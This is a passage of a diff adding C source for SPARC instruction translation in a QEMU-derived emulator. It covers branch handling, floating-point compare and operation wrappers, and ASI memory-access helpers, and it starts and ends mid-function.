target; + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->sparc_cpu_pc, *(TCGv *)tcg_ctx->cpu_npc); + } + } else { + flush_cond(dc); + gen_fcond(dc, *(TCGv *)tcg_ctx->cpu_cond, cc, cond); + if (a) { + gen_branch_a(dc, target, dc->npc, *(TCGv *)tcg_ctx->cpu_cond); + dc->is_br = 1; + } else { + dc->pc = dc->npc; + dc->jump_pc[0] = target; + if (unlikely(dc->npc == DYNAMIC_PC)) { + dc->jump_pc[1] = DYNAMIC_PC; + tcg_gen_addi_tl(tcg_ctx, *(TCGv *)tcg_ctx->sparc_cpu_pc, *(TCGv *)tcg_ctx->cpu_npc, 4); + } else { + dc->jump_pc[1] = dc->npc + 4; + dc->npc = JUMP_PC; + } + } + } +} + +#ifdef TARGET_SPARC64 +static void do_branch_reg(DisasContext *dc, int32_t offset, uint32_t insn, + TCGv r_reg) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + unsigned int cond = GET_FIELD_SP(insn, 25, 27), a = (insn & (1 << 29)); + target_ulong target = dc->pc + offset; + + if (unlikely(AM_CHECK(dc))) { + target &= 0xffffffffULL; + } + flush_cond(dc); + gen_cond_reg(dc, *(TCGv *)tcg_ctx->cpu_cond, cond, r_reg); + if (a) { + gen_branch_a(dc, target, dc->npc, *(TCGv *)tcg_ctx->cpu_cond); + dc->is_br = 1; + } else { + dc->pc = dc->npc; + dc->jump_pc[0] = target; + if (unlikely(dc->npc == DYNAMIC_PC)) { + dc->jump_pc[1] = DYNAMIC_PC; + tcg_gen_addi_tl(tcg_ctx, *(TCGv *)tcg_ctx->sparc_cpu_pc, *(TCGv *)tcg_ctx->cpu_npc, 4); + } else { + dc->jump_pc[1] = dc->npc + 4; + dc->npc = JUMP_PC; + } + } +} + +static inline void gen_op_fcmps(DisasContext *dc, int fccno, TCGv_i32 r_rs1, TCGv_i32 r_rs2) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + switch (fccno) { + case 0: + gen_helper_fcmps(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); + break; + case 1: + gen_helper_fcmps_fcc1(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); + break; + case 2: + gen_helper_fcmps_fcc2(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); + break; + case 3: + gen_helper_fcmps_fcc3(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); + break; + } +} + +static inline void gen_op_fcmpd(DisasContext *dc, int fccno, TCGv_i64 r_rs1, TCGv_i64 r_rs2) +{ + TCGContext 
*tcg_ctx = dc->uc->tcg_ctx; + switch (fccno) { + case 0: + gen_helper_fcmpd(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); + break; + case 1: + gen_helper_fcmpd_fcc1(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); + break; + case 2: + gen_helper_fcmpd_fcc2(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); + break; + case 3: + gen_helper_fcmpd_fcc3(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); + break; + } +} + +static inline void gen_op_fcmpq(DisasContext *dc, int fccno) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + switch (fccno) { + case 0: + gen_helper_fcmpq(tcg_ctx, tcg_ctx->cpu_env); + break; + case 1: + gen_helper_fcmpq_fcc1(tcg_ctx, tcg_ctx->cpu_env); + break; + case 2: + gen_helper_fcmpq_fcc2(tcg_ctx, tcg_ctx->cpu_env); + break; + case 3: + gen_helper_fcmpq_fcc3(tcg_ctx, tcg_ctx->cpu_env); + break; + } +} + +static inline void gen_op_fcmpes(DisasContext *dc, int fccno, TCGv_i32 r_rs1, TCGv_i32 r_rs2) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + switch (fccno) { + case 0: + gen_helper_fcmpes(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); + break; + case 1: + gen_helper_fcmpes_fcc1(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); + break; + case 2: + gen_helper_fcmpes_fcc2(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); + break; + case 3: + gen_helper_fcmpes_fcc3(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); + break; + } +} + +static inline void gen_op_fcmped(DisasContext *dc, int fccno, TCGv_i64 r_rs1, TCGv_i64 r_rs2) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + switch (fccno) { + case 0: + gen_helper_fcmped(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); + break; + case 1: + gen_helper_fcmped_fcc1(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); + break; + case 2: + gen_helper_fcmped_fcc2(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); + break; + case 3: + gen_helper_fcmped_fcc3(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); + break; + } +} + +static inline void gen_op_fcmpeq(DisasContext *dc, int fccno) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + switch (fccno) { + case 0: + gen_helper_fcmpeq(tcg_ctx, tcg_ctx->cpu_env); 
+ break; + case 1: + gen_helper_fcmpeq_fcc1(tcg_ctx, tcg_ctx->cpu_env); + break; + case 2: + gen_helper_fcmpeq_fcc2(tcg_ctx, tcg_ctx->cpu_env); + break; + case 3: + gen_helper_fcmpeq_fcc3(tcg_ctx, tcg_ctx->cpu_env); + break; + } +} + +#else + +static inline void gen_op_fcmps(DisasContext *dc, int fccno, TCGv r_rs1, TCGv r_rs2) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + gen_helper_fcmps(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); +} + +static inline void gen_op_fcmpd(DisasContext *dc, int fccno, TCGv_i64 r_rs1, TCGv_i64 r_rs2) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + gen_helper_fcmpd(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); +} + +static inline void gen_op_fcmpq(DisasContext *dc, int fccno) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + gen_helper_fcmpq(tcg_ctx, tcg_ctx->cpu_env); +} + +static inline void gen_op_fcmpes(DisasContext *dc, int fccno, TCGv r_rs1, TCGv r_rs2) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + gen_helper_fcmpes(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); +} + +static inline void gen_op_fcmped(DisasContext *dc, int fccno, TCGv_i64 r_rs1, TCGv_i64 r_rs2) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + gen_helper_fcmped(tcg_ctx, tcg_ctx->cpu_env, r_rs1, r_rs2); +} + +static inline void gen_op_fcmpeq(DisasContext *dc, int fccno) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + gen_helper_fcmpeq(tcg_ctx, tcg_ctx->cpu_env); +} +#endif + +static inline void gen_op_fpexception_im(DisasContext *dc, int fsr_flags) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 r_const; + + tcg_gen_andi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_fsr, *(TCGv *)tcg_ctx->cpu_fsr, FSR_FTT_NMASK); + tcg_gen_ori_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_fsr, *(TCGv *)tcg_ctx->cpu_fsr, fsr_flags); + r_const = tcg_const_i32(tcg_ctx, TT_FP_EXCP); + gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, r_const); + tcg_temp_free_i32(tcg_ctx, r_const); +} + +static int gen_trap_ifnofpu(DisasContext *dc) +{ +#if !defined(CONFIG_USER_ONLY) + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + if 
(!dc->fpu_enabled) { + TCGv_i32 r_const; + + save_state(dc); + r_const = tcg_const_i32(tcg_ctx, TT_NFPU_INSN); + gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, r_const); + tcg_temp_free_i32(tcg_ctx, r_const); + dc->is_br = 1; + return 1; + } +#endif + return 0; +} + +static inline void gen_op_clear_ieee_excp_and_FTT(DisasContext *dc) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + tcg_gen_andi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_fsr, *(TCGv *)tcg_ctx->cpu_fsr, FSR_FTT_CEXC_NMASK); +} + +static inline void gen_fop_FF(DisasContext *dc, int rd, int rs, + void (*gen)(TCGContext *tcg_ctx, TCGv_i32, TCGv_ptr, TCGv_i32)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 dst, src; + + src = gen_load_fpr_F(dc, rs); + dst = gen_dest_fpr_F(dc); + + gen(tcg_ctx, dst, tcg_ctx->cpu_env, src); + + gen_store_fpr_F(dc, rd, dst); +} + +static inline void gen_ne_fop_FF(DisasContext *dc, int rd, int rs, + void (*gen)(TCGContext *tcg_ctx, TCGv_i32, TCGv_i32)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 dst, src; + + src = gen_load_fpr_F(dc, rs); + dst = gen_dest_fpr_F(dc); + + gen(tcg_ctx, dst, src); + + gen_store_fpr_F(dc, rd, dst); +} + +static inline void gen_fop_FFF(DisasContext *dc, int rd, int rs1, int rs2, + void (*gen)(TCGContext *tcg_ctx, TCGv_i32, TCGv_ptr, TCGv_i32, TCGv_i32)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 dst, src1, src2; + + src1 = gen_load_fpr_F(dc, rs1); + src2 = gen_load_fpr_F(dc, rs2); + dst = gen_dest_fpr_F(dc); + + gen(tcg_ctx, dst, tcg_ctx->cpu_env, src1, src2); + + gen_store_fpr_F(dc, rd, dst); +} + +#ifdef TARGET_SPARC64 +static inline void gen_ne_fop_FFF(DisasContext *dc, int rd, int rs1, int rs2, + void (*gen)(TCGContext *tcg_ctx, TCGv_i32, TCGv_i32, TCGv_i32)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 dst, src1, src2; + + src1 = gen_load_fpr_F(dc, rs1); + src2 = gen_load_fpr_F(dc, rs2); + dst = gen_dest_fpr_F(dc); + + gen(tcg_ctx, dst, src1, src2); + + gen_store_fpr_F(dc, rd, dst); +} +#endif + +static 
inline void gen_fop_DD(DisasContext *dc, int rd, int rs, + void (*gen)(TCGContext *tcg_ctx, TCGv_i64, TCGv_ptr, TCGv_i64)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i64 dst, src; + + src = gen_load_fpr_D(dc, rs); + dst = gen_dest_fpr_D(dc, rd); + + gen(tcg_ctx, dst, tcg_ctx->cpu_env, src); + + gen_store_fpr_D(dc, rd, dst); +} + +#ifdef TARGET_SPARC64 +static inline void gen_ne_fop_DD(DisasContext *dc, int rd, int rs, + void (*gen)(TCGContext *tcg_ctx, TCGv_i64, TCGv_i64)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i64 dst, src; + + src = gen_load_fpr_D(dc, rs); + dst = gen_dest_fpr_D(dc, rd); + + gen(tcg_ctx, dst, src); + + gen_store_fpr_D(dc, rd, dst); +} +#endif + +static inline void gen_fop_DDD(DisasContext *dc, int rd, int rs1, int rs2, + void (*gen)(TCGContext *tcg_ctx, TCGv_i64, TCGv_ptr, TCGv_i64, TCGv_i64)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i64 dst, src1, src2; + + src1 = gen_load_fpr_D(dc, rs1); + src2 = gen_load_fpr_D(dc, rs2); + dst = gen_dest_fpr_D(dc, rd); + + gen(tcg_ctx, dst, tcg_ctx->cpu_env, src1, src2); + + gen_store_fpr_D(dc, rd, dst); +} + +#ifdef TARGET_SPARC64 +static inline void gen_ne_fop_DDD(DisasContext *dc, int rd, int rs1, int rs2, + void (*gen)(TCGContext *tcg_ctx, TCGv_i64, TCGv_i64, TCGv_i64)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i64 dst, src1, src2; + + src1 = gen_load_fpr_D(dc, rs1); + src2 = gen_load_fpr_D(dc, rs2); + dst = gen_dest_fpr_D(dc, rd); + + gen(tcg_ctx, dst, src1, src2); + + gen_store_fpr_D(dc, rd, dst); +} + +static inline void gen_gsr_fop_DDD(DisasContext *dc, int rd, int rs1, int rs2, + void (*gen)(TCGContext *tcg_ctx, TCGv_i64, TCGv_i64, TCGv_i64, TCGv_i64)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i64 dst, src1, src2; + + src1 = gen_load_fpr_D(dc, rs1); + src2 = gen_load_fpr_D(dc, rs2); + dst = gen_dest_fpr_D(dc, rd); + + gen(tcg_ctx, dst, *(TCGv *)tcg_ctx->cpu_gsr, src1, src2); + + gen_store_fpr_D(dc, rd, dst); +} + +static inline void 
gen_ne_fop_DDDD(DisasContext *dc, int rd, int rs1, int rs2, + void (*gen)(TCGContext *tcg_ctx, TCGv_i64, TCGv_i64, TCGv_i64, TCGv_i64)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i64 dst, src0, src1, src2; + + src1 = gen_load_fpr_D(dc, rs1); + src2 = gen_load_fpr_D(dc, rs2); + src0 = gen_load_fpr_D(dc, rd); + dst = gen_dest_fpr_D(dc, rd); + + gen(tcg_ctx, dst, src0, src1, src2); + + gen_store_fpr_D(dc, rd, dst); +} +#endif + +static inline void gen_fop_QQ(DisasContext *dc, int rd, int rs, + void (*gen)(TCGContext *tcg_ctx, TCGv_ptr)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + gen_op_load_fpr_QT1(dc, QFPREG(rs)); + + gen(tcg_ctx, tcg_ctx->cpu_env); + + gen_op_store_QT0_fpr(dc, QFPREG(rd)); + gen_update_fprs_dirty(dc, QFPREG(rd)); +} + +#ifdef TARGET_SPARC64 +static inline void gen_ne_fop_QQ(DisasContext *dc, int rd, int rs, + void (*gen)(TCGContext *tcg_ctx, TCGv_ptr)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + gen_op_load_fpr_QT1(dc, QFPREG(rs)); + + gen(tcg_ctx, tcg_ctx->cpu_env); + + gen_op_store_QT0_fpr(dc, QFPREG(rd)); + gen_update_fprs_dirty(dc, QFPREG(rd)); +} +#endif + +static inline void gen_fop_QQQ(DisasContext *dc, int rd, int rs1, int rs2, + void (*gen)(TCGContext *tcg_ctx, TCGv_ptr)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + gen_op_load_fpr_QT0(dc, QFPREG(rs1)); + gen_op_load_fpr_QT1(dc, QFPREG(rs2)); + + gen(tcg_ctx, tcg_ctx->cpu_env); + + gen_op_store_QT0_fpr(dc, QFPREG(rd)); + gen_update_fprs_dirty(dc, QFPREG(rd)); +} + +static inline void gen_fop_DFF(DisasContext *dc, int rd, int rs1, int rs2, + void (*gen)(TCGContext *tcg_ctx, TCGv_i64, TCGv_ptr, TCGv_i32, TCGv_i32)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i64 dst; + TCGv_i32 src1, src2; + + src1 = gen_load_fpr_F(dc, rs1); + src2 = gen_load_fpr_F(dc, rs2); + dst = gen_dest_fpr_D(dc, rd); + + gen(tcg_ctx, dst, tcg_ctx->cpu_env, src1, src2); + + gen_store_fpr_D(dc, rd, dst); +} + +static inline void gen_fop_QDD(DisasContext *dc, int rd, int rs1, int rs2, + void 
(*gen)(TCGContext *tcg_ctx, TCGv_ptr, TCGv_i64, TCGv_i64)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i64 src1, src2; + + src1 = gen_load_fpr_D(dc, rs1); + src2 = gen_load_fpr_D(dc, rs2); + + gen(tcg_ctx, tcg_ctx->cpu_env, src1, src2); + + gen_op_store_QT0_fpr(dc, QFPREG(rd)); + gen_update_fprs_dirty(dc, QFPREG(rd)); +} + +#ifdef TARGET_SPARC64 +static inline void gen_fop_DF(DisasContext *dc, int rd, int rs, + void (*gen)(TCGContext *tcg_ctx, TCGv_i64, TCGv_ptr, TCGv_i32)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i64 dst; + TCGv_i32 src; + + src = gen_load_fpr_F(dc, rs); + dst = gen_dest_fpr_D(dc, rd); + + gen(tcg_ctx, dst, tcg_ctx->cpu_env, src); + + gen_store_fpr_D(dc, rd, dst); +} +#endif + +static inline void gen_ne_fop_DF(DisasContext *dc, int rd, int rs, + void (*gen)(TCGContext *tcg_ctx, TCGv_i64, TCGv_ptr, TCGv_i32)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i64 dst; + TCGv_i32 src; + + src = gen_load_fpr_F(dc, rs); + dst = gen_dest_fpr_D(dc, rd); + + gen(tcg_ctx, dst, tcg_ctx->cpu_env, src); + + gen_store_fpr_D(dc, rd, dst); +} + +static inline void gen_fop_FD(DisasContext *dc, int rd, int rs, + void (*gen)(TCGContext *tcg_ctx, TCGv_i32, TCGv_ptr, TCGv_i64)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 dst; + TCGv_i64 src; + + src = gen_load_fpr_D(dc, rs); + dst = gen_dest_fpr_F(dc); + + gen(tcg_ctx, dst, tcg_ctx->cpu_env, src); + + gen_store_fpr_F(dc, rd, dst); +} + +static inline void gen_fop_FQ(DisasContext *dc, int rd, int rs, + void (*gen)(TCGContext *tcg_ctx, TCGv_i32, TCGv_ptr)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 dst; + + gen_op_load_fpr_QT1(dc, QFPREG(rs)); + dst = gen_dest_fpr_F(dc); + + gen(tcg_ctx, dst, tcg_ctx->cpu_env); + + gen_store_fpr_F(dc, rd, dst); +} + +static inline void gen_fop_DQ(DisasContext *dc, int rd, int rs, + void (*gen)(TCGContext *tcg_ctx, TCGv_i64, TCGv_ptr)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i64 dst; + + gen_op_load_fpr_QT1(dc, QFPREG(rs)); + dst = 
gen_dest_fpr_D(dc, rd); + + gen(tcg_ctx, dst, tcg_ctx->cpu_env); + + gen_store_fpr_D(dc, rd, dst); +} + +static inline void gen_ne_fop_QF(DisasContext *dc, int rd, int rs, + void (*gen)(TCGContext *tcg_ctx, TCGv_ptr, TCGv_i32)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 src; + + src = gen_load_fpr_F(dc, rs); + + gen(tcg_ctx, tcg_ctx->cpu_env, src); + + gen_op_store_QT0_fpr(dc, QFPREG(rd)); + gen_update_fprs_dirty(dc, QFPREG(rd)); +} + +static inline void gen_ne_fop_QD(DisasContext *dc, int rd, int rs, + void (*gen)(TCGContext *tcg_ctx, TCGv_ptr, TCGv_i64)) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i64 src; + + src = gen_load_fpr_D(dc, rs); + + gen(tcg_ctx, tcg_ctx->cpu_env, src); + + gen_op_store_QT0_fpr(dc, QFPREG(rd)); + gen_update_fprs_dirty(dc, QFPREG(rd)); +} + +/* asi moves */ +#ifdef TARGET_SPARC64 +static inline TCGv_i32 gen_get_asi(DisasContext *dc, int insn, TCGv r_addr) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + int asi; + TCGv_i32 r_asi; + + if (IS_IMM) { + r_asi = tcg_temp_new_i32(tcg_ctx); + tcg_gen_mov_i32(tcg_ctx, r_asi, tcg_ctx->cpu_asi); + } else { + asi = GET_FIELD(insn, 19, 26); + r_asi = tcg_const_i32(tcg_ctx, asi); + } + return r_asi; +} + +static inline void gen_ld_asi(DisasContext *dc, TCGv dst, TCGv addr, int insn, int size, + int sign) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 r_asi, r_size, r_sign; + + r_asi = gen_get_asi(dc, insn, addr); + r_size = tcg_const_i32(tcg_ctx, size); + r_sign = tcg_const_i32(tcg_ctx, sign); + gen_helper_ld_asi(tcg_ctx, dst, tcg_ctx->cpu_env, addr, r_asi, r_size, r_sign); + tcg_temp_free_i32(tcg_ctx, r_sign); + tcg_temp_free_i32(tcg_ctx, r_size); + tcg_temp_free_i32(tcg_ctx, r_asi); +} + +static inline void gen_st_asi(DisasContext *dc, TCGv src, TCGv addr, int insn, int size) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 r_asi, r_size; + + r_asi = gen_get_asi(dc, insn, addr); + r_size = tcg_const_i32(tcg_ctx, size); + gen_helper_st_asi(tcg_ctx, tcg_ctx->cpu_env, 
addr, src, r_asi, r_size);
    tcg_temp_free_i32(tcg_ctx, r_size);
    tcg_temp_free_i32(tcg_ctx, r_asi);
}

/* FP load with ASI.  rd is handed to the helper, which updates the FP
   register file itself (no TCG-level destination).  */
static inline void gen_ldf_asi(DisasContext *dc, TCGv addr, int insn, int size, int rd)
{
    TCGContext *tcg_ctx = dc->uc->tcg_ctx;
    TCGv_i32 r_asi, r_size, r_rd;

    r_asi = gen_get_asi(dc, insn, addr);
    r_size = tcg_const_i32(tcg_ctx, size);
    r_rd = tcg_const_i32(tcg_ctx, rd);
    gen_helper_ldf_asi(tcg_ctx, tcg_ctx->cpu_env, addr, r_asi, r_size, r_rd);
    tcg_temp_free_i32(tcg_ctx, r_rd);
    tcg_temp_free_i32(tcg_ctx, r_size);
    tcg_temp_free_i32(tcg_ctx, r_asi);
}

/* FP store with ASI; mirror of gen_ldf_asi.  */
static inline void gen_stf_asi(DisasContext *dc, TCGv addr, int insn, int size, int rd)
{
    TCGContext *tcg_ctx = dc->uc->tcg_ctx;
    TCGv_i32 r_asi, r_size, r_rd;

    r_asi = gen_get_asi(dc, insn, addr);
    r_size = tcg_const_i32(tcg_ctx, size);
    r_rd = tcg_const_i32(tcg_ctx, rd);
    gen_helper_stf_asi(tcg_ctx, tcg_ctx->cpu_env, addr, r_asi, r_size, r_rd);
    tcg_temp_free_i32(tcg_ctx, r_rd);
    tcg_temp_free_i32(tcg_ctx, r_size);
    tcg_temp_free_i32(tcg_ctx, r_asi);
}

/* SWAP with ASI: load the old 32-bit word into t64, store src to the
   same address, return the old word (truncated) in dst.
   NOTE(review): the load and store are separate helper calls, so the
   sequence is not atomic with respect to other agents — confirm this
   matches the emulator's memory model expectations.  */
static inline void gen_swap_asi(DisasContext *dc, TCGv dst, TCGv src, TCGv addr, int insn)
{
    TCGContext *tcg_ctx = dc->uc->tcg_ctx;
    TCGv_i32 r_asi, r_size, r_sign;
    TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx);

    r_asi = gen_get_asi(dc, insn, addr);
    r_size = tcg_const_i32(tcg_ctx, 4);
    r_sign = tcg_const_i32(tcg_ctx, 0);
    gen_helper_ld_asi(tcg_ctx, t64, tcg_ctx->cpu_env, addr, r_asi, r_size, r_sign);
    tcg_temp_free_i32(tcg_ctx, r_sign);
    gen_helper_st_asi(tcg_ctx, tcg_ctx->cpu_env, addr, src, r_asi, r_size);
    tcg_temp_free_i32(tcg_ctx, r_size);
    tcg_temp_free_i32(tcg_ctx, r_asi);
    tcg_gen_trunc_i64_tl(tcg_ctx, dst, t64);
    tcg_temp_free_i64(tcg_ctx, t64);
}

/* LDDA with ASI (64-bit target): the helper writes both destination
   registers itself, given rd.  */
static inline void gen_ldda_asi(DisasContext *dc, TCGv hi, TCGv addr,
                                int insn, int rd)
{
    TCGContext *tcg_ctx = dc->uc->tcg_ctx;
    TCGv_i32 r_asi, r_rd;

    r_asi = gen_get_asi(dc, insn, addr);
    r_rd = tcg_const_i32(tcg_ctx, rd);
gen_helper_ldda_asi(tcg_ctx, tcg_ctx->cpu_env, addr, r_asi, r_rd);
    tcg_temp_free_i32(tcg_ctx, r_rd);
    tcg_temp_free_i32(tcg_ctx, r_asi);
}

/* STDA with ASI (64-bit target): concatenate the register pair
   (rd+1 = low word, hi = rd = high word) and store as one 8-byte
   access.  */
static inline void gen_stda_asi(DisasContext *dc, TCGv hi, TCGv addr,
                                int insn, int rd)
{
    TCGContext *tcg_ctx = dc->uc->tcg_ctx;
    TCGv_i32 r_asi, r_size;
    TCGv lo = gen_load_gpr(dc, rd + 1);
    TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx);

    tcg_gen_concat_tl_i64(tcg_ctx, t64, lo, hi);
    r_asi = gen_get_asi(dc, insn, addr);
    r_size = tcg_const_i32(tcg_ctx, 8);
    gen_helper_st_asi(tcg_ctx, tcg_ctx->cpu_env, addr, t64, r_asi, r_size);
    tcg_temp_free_i32(tcg_ctx, r_size);
    tcg_temp_free_i32(tcg_ctx, r_asi);
    tcg_temp_free_i64(tcg_ctx, t64);
}

/* CASXA: 64-bit compare-and-swap via helper.  rd supplies the compare
   value and receives the value loaded from memory.  */
static inline void gen_casx_asi(DisasContext *dc, TCGv addr,
                                TCGv val2, int insn, int rd)
{
    TCGContext *tcg_ctx = dc->uc->tcg_ctx;
    TCGv val1 = gen_load_gpr(dc, rd);
    TCGv dst = gen_dest_gpr(dc, rd);
    TCGv_i32 r_asi = gen_get_asi(dc, insn, addr);

    gen_helper_casx_asi(tcg_ctx, dst, tcg_ctx->cpu_env, addr, val1, val2, r_asi);
    tcg_temp_free_i32(tcg_ctx, r_asi);
    gen_store_gpr(dc, rd, dst);
}

#elif !defined(CONFIG_USER_ONLY)

/* 32-bit system-mode variants: the ASI always comes from the insn
   field (no %asi register); the helpers traffic in i64 values that are
   truncated/extended to target width at the edges.  */
static inline void gen_ld_asi(DisasContext *dc, TCGv dst, TCGv addr, int insn, int size,
                              int sign)
{
    TCGContext *tcg_ctx = dc->uc->tcg_ctx;
    TCGv_i32 r_asi, r_size, r_sign;
    TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx);

    r_asi = tcg_const_i32(tcg_ctx, GET_FIELD(insn, 19, 26));
    r_size = tcg_const_i32(tcg_ctx, size);
    r_sign = tcg_const_i32(tcg_ctx, sign);
    gen_helper_ld_asi(tcg_ctx, t64, tcg_ctx->cpu_env, addr, r_asi, r_size, r_sign);
    tcg_temp_free_i32(tcg_ctx, r_sign);
    tcg_temp_free_i32(tcg_ctx, r_size);
    tcg_temp_free_i32(tcg_ctx, r_asi);
    tcg_gen_trunc_i64_tl(tcg_ctx, dst, t64);
    tcg_temp_free_i64(tcg_ctx, t64);
}

/* Store counterpart: widen src to i64 for the helper.  */
static inline void gen_st_asi(DisasContext *dc, TCGv src, TCGv addr, int insn, int size)
{
    TCGContext *tcg_ctx = dc->uc->tcg_ctx;
    TCGv_i32 r_asi, r_size;
    TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx);
+ tcg_gen_extu_tl_i64(tcg_ctx, t64, src); + r_asi = tcg_const_i32(tcg_ctx, GET_FIELD(insn, 19, 26)); + r_size = tcg_const_i32(tcg_ctx, size); + gen_helper_st_asi(tcg_ctx, tcg_ctx->cpu_env, addr, t64, r_asi, r_size); + tcg_temp_free_i32(tcg_ctx, r_size); + tcg_temp_free_i32(tcg_ctx, r_asi); + tcg_temp_free_i64(tcg_ctx, t64); +} + +static inline void gen_swap_asi(DisasContext *dc, TCGv dst, TCGv src, TCGv addr, int insn) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 r_asi, r_size, r_sign; + TCGv_i64 r_val, t64; + + r_asi = tcg_const_i32(tcg_ctx, GET_FIELD(insn, 19, 26)); + r_size = tcg_const_i32(tcg_ctx, 4); + r_sign = tcg_const_i32(tcg_ctx, 0); + t64 = tcg_temp_new_i64(tcg_ctx); + gen_helper_ld_asi(tcg_ctx, t64, tcg_ctx->cpu_env, addr, r_asi, r_size, r_sign); + tcg_temp_free(tcg_ctx, r_sign); + r_val = tcg_temp_new_i64(tcg_ctx); + tcg_gen_extu_tl_i64(tcg_ctx, r_val, src); + gen_helper_st_asi(tcg_ctx, tcg_ctx->cpu_env, addr, r_val, r_asi, r_size); + tcg_temp_free_i64(tcg_ctx, r_val); + tcg_temp_free_i32(tcg_ctx, r_size); + tcg_temp_free_i32(tcg_ctx, r_asi); + tcg_gen_trunc_i64_tl(tcg_ctx, dst, t64); + tcg_temp_free_i64(tcg_ctx, t64); +} + +static inline void gen_ldda_asi(DisasContext *dc, TCGv hi, TCGv addr, + int insn, int rd) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 r_asi, r_size, r_sign; + TCGv t; + TCGv_i64 t64; + + r_asi = tcg_const_i32(tcg_ctx, GET_FIELD(insn, 19, 26)); + r_size = tcg_const_i32(tcg_ctx, 8); + r_sign = tcg_const_i32(tcg_ctx, 0); + t64 = tcg_temp_new_i64(tcg_ctx); + gen_helper_ld_asi(tcg_ctx, t64, tcg_ctx->cpu_env, addr, r_asi, r_size, r_sign); + tcg_temp_free_i32(tcg_ctx, r_sign); + tcg_temp_free_i32(tcg_ctx, r_size); + tcg_temp_free_i32(tcg_ctx, r_asi); + + t = gen_dest_gpr(dc, rd + 1); + tcg_gen_trunc_i64_tl(tcg_ctx, t, t64); + gen_store_gpr(dc, rd + 1, t); + + tcg_gen_shri_i64(tcg_ctx, t64, t64, 32); + tcg_gen_trunc_i64_tl(tcg_ctx, hi, t64); + tcg_temp_free_i64(tcg_ctx, t64); + gen_store_gpr(dc, rd, hi); +} + +static 
inline void gen_stda_asi(DisasContext *dc, TCGv hi, TCGv addr,
                                int insn, int rd)
{
    TCGContext *tcg_ctx = dc->uc->tcg_ctx;
    TCGv_i32 r_asi, r_size;
    TCGv lo = gen_load_gpr(dc, rd + 1);
